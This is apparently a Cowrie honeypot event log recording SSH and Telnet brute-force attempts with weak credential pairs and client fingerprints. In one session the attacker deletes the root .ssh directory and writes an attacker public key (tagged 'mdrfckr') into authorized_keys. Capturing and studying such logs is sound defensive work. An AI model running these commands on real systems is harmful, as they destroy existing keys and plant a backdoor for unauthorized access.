{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:05:44.749178Z","src_ip":"212.227.125.160","session":"9a0556ebebe4"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234567","message":"login attempt [git/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:05:45.261190Z","src_ip":"212.227.125.160","session":"9a0556ebebe4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:46.435470Z","src_ip":"212.227.125.160","session":"9a0556ebebe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57810,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce35314236f","protocol":"ssh","message":"New connection: 212.227.125.160:57810 (1.2.3.4:22) [session: 1ce35314236f]","sensor":"my-vps","timestamp":"2025-08-28T13:05:50.073830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:05:50.074651Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:05:50.272386Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.login.success","username":"root","password":"qpalzm123","message":"login attempt [root/qpalzm123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:05:51.117328Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:05:54.158098Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:05:54.159038Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:05:54.160520Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:55.024561Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:05:55.236867Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:05:55.237584Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:05:56.091639Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:05:56.092532Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35305,"dst_ip":"1.2.3.4","dst_port":22,"session":"e93dc7125da3","protocol":"ssh","message":"New connection: 212.227.125.160:35305 (1.2.3.4:22) [session: e93dc7125da3]","sensor":"my-vps","timestamp":"2025-08-28T13:05:56.638486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:05:56.639784Z","src_ip":"212.227.125.160","session":"e93dc7125da3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:05:56.847820Z","src_ip":"212.227.125.160","session":"e93dc7125da3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T13:05:58.786431Z","src_ip":"212.227.125.160","session":"e93dc7125da3"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:01.395758Z","src_ip":"212.227.125.160","session":"e93dc7125da3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37440,"dst_ip":"1.2.3.4","dst_port":22,"session":"90269275f617","protocol":"ssh","message":"New connection: 212.227.125.160:37440 (1.2.3.4:22) [session: 90269275f617]","sensor":"my-vps","timestamp":"2025-08-28T13:06:03.207298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:06:03.208414Z","src_ip":"212.227.125.160","session":"90269275f617"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:06:03.429507Z","src_ip":"212.227.125.160","session":"90269275f617"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:06:04.803165Z","src_ip":"212.227.125.160","session":"90269275f617"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:05.019735Z","src_ip":"212.227.125.160","session":"90269275f617"}
{"eventid":"cowrie.session.closed","duration":"14.9","message":"Connection lost after 14.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:05.023039Z","src_ip":"212.227.125.160","session":"1ce35314236f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33660,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c6cfd360eb3","protocol":"telnet","message":"New connection: 212.227.235.229:33660 (1.2.3.4:23) [session: 7c6cfd360eb3]","sensor":"my-vps","timestamp":"2025-08-28T13:06:14.468413Z"}
{"eventid":"cowrie.session.connect","src_ip":"37.143.61.47","src_port":60690,"dst_ip":"1.2.3.4","dst_port":22,"session":"34203c290608","protocol":"ssh","message":"New connection: 37.143.61.47:60690 (1.2.3.4:22) [session: 34203c290608]","sensor":"my-vps","timestamp":"2025-08-28T13:06:17.080080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:06:17.080940Z","src_ip":"37.143.61.47","session":"34203c290608"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T13:06:17.111124Z","src_ip":"37.143.61.47","session":"34203c290608"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41246,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0c0377d9695","protocol":"ssh","message":"New connection: 212.227.125.160:41246 (1.2.3.4:22) [session: a0c0377d9695]","sensor":"my-vps","timestamp":"2025-08-28T13:06:20.566081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:06:20.566988Z","src_ip":"212.227.125.160","session":"a0c0377d9695"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:06:20.744370Z","src_ip":"212.227.125.160","session":"a0c0377d9695"}
{"eventid":"cowrie.login.failed","username":"svn","password":"123456","message":"login attempt [svn/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:06:21.278005Z","src_ip":"212.227.125.160","session":"a0c0377d9695"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:22.598001Z","src_ip":"212.227.125.160","session":"a0c0377d9695"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:24.465635Z","src_ip":"37.143.61.47","session":"34203c290608"}
{"eventid":"cowrie.session.closed","duration":30.84194588661194,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:45.310286Z","src_ip":"212.227.235.229","session":"7c6cfd360eb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34732,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d80de67623e","protocol":"ssh","message":"New connection: 212.227.125.160:34732 (1.2.3.4:22) [session: 7d80de67623e]","sensor":"my-vps","timestamp":"2025-08-28T13:06:55.906760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:06:55.909519Z","src_ip":"212.227.125.160","session":"7d80de67623e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:06:56.075190Z","src_ip":"212.227.125.160","session":"7d80de67623e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44996,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ebc842174ee","protocol":"ssh","message":"New connection: 212.227.235.229:44996 (1.2.3.4:22) [session: 3ebc842174ee]","sensor":"my-vps","timestamp":"2025-08-28T13:06:56.674290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:06:56.675278Z","src_ip":"212.227.235.229","session":"3ebc842174ee"}
{"eventid":"cowrie.login.failed","username":"svn","password":"password","message":"login attempt [svn/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:06:56.761998Z","src_ip":"212.227.125.160","session":"7d80de67623e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:06:56.882575Z","src_ip":"212.227.235.229","session":"3ebc842174ee"}
{"eventid":"cowrie.login.failed","username":"cat","password":"123456","message":"login attempt [cat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:06:57.752849Z","src_ip":"212.227.235.229","session":"3ebc842174ee"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:57.937738Z","src_ip":"212.227.125.160","session":"7d80de67623e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:06:58.962089Z","src_ip":"212.227.235.229","session":"3ebc842174ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53314,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9f7d89783b9","protocol":"telnet","message":"New connection: 212.227.235.229:53314 (1.2.3.4:23) [session: d9f7d89783b9]","sensor":"my-vps","timestamp":"2025-08-28T13:07:08.753584Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47908,"dst_ip":"1.2.3.4","dst_port":22,"session":"03bab5147156","protocol":"ssh","message":"New connection: 212.227.125.160:47908 (1.2.3.4:22) [session: 03bab5147156]","sensor":"my-vps","timestamp":"2025-08-28T13:07:29.988292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:07:29.989000Z","src_ip":"212.227.125.160","session":"03bab5147156"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","dif